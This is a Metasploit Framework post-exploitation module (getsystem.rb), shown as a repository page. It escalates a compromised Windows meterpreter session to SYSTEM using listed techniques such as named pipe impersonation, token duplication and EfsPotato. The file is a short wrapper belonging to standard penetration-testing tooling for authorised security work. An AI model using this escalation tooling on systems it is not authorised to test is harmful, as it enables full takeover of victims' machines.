Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/escalate/getsystem.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasm'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::Windows::Priv

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Windows Escalation',

16
        'Description' => %q{

17
          This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various

18
          techniques.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => 'hdm',

22
        'Platform' => [ 'win' ],

23
        'SessionTypes' => [ 'meterpreter' ],

24
        'Compat' => {

25
          'Meterpreter' => {

26
            'Commands' => %w[

27
              priv_elevate_getsystem

28
            ]

29
          }

30
        },

31
        'Notes' => {

32
          'AKA' => [

33
            'Named Pipe Impersonation',

34
            'Token Duplication',

35
            'RPCSS',

36
            'PrintSpooler',

37
            'EFSRPC',

38
            'EfsPotato'

39
          ],

40
          'Stability' => [CRASH_SAFE],

41
          'SideEffects' => [],

42
          'Reliability' => []

43
        }

44
      )

45
    )

46


47
    register_options([

48
      OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])

49
    ])

50
  end

51


52
  def unsupported

53
    print_error('This platform is not supported with this script!')

54
    raise Rex::Script::Completed

55
  end

56


57
  def run

58
    technique = datastore['TECHNIQUE'].to_i

59


60
    unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)

61


62
    if is_system?

63
      print_good('This session already has SYSTEM privileges')

64
      return

65
    end

66


67
    begin

68
      result = client.priv.getsystem(technique)

69
      print_good("Obtained SYSTEM via technique #{result[1]}")

70
    rescue Rex::Post::Meterpreter::RequestError

71
      print_error('Failed to obtain SYSTEM access')

72
    end

73
  end

74
end

75


76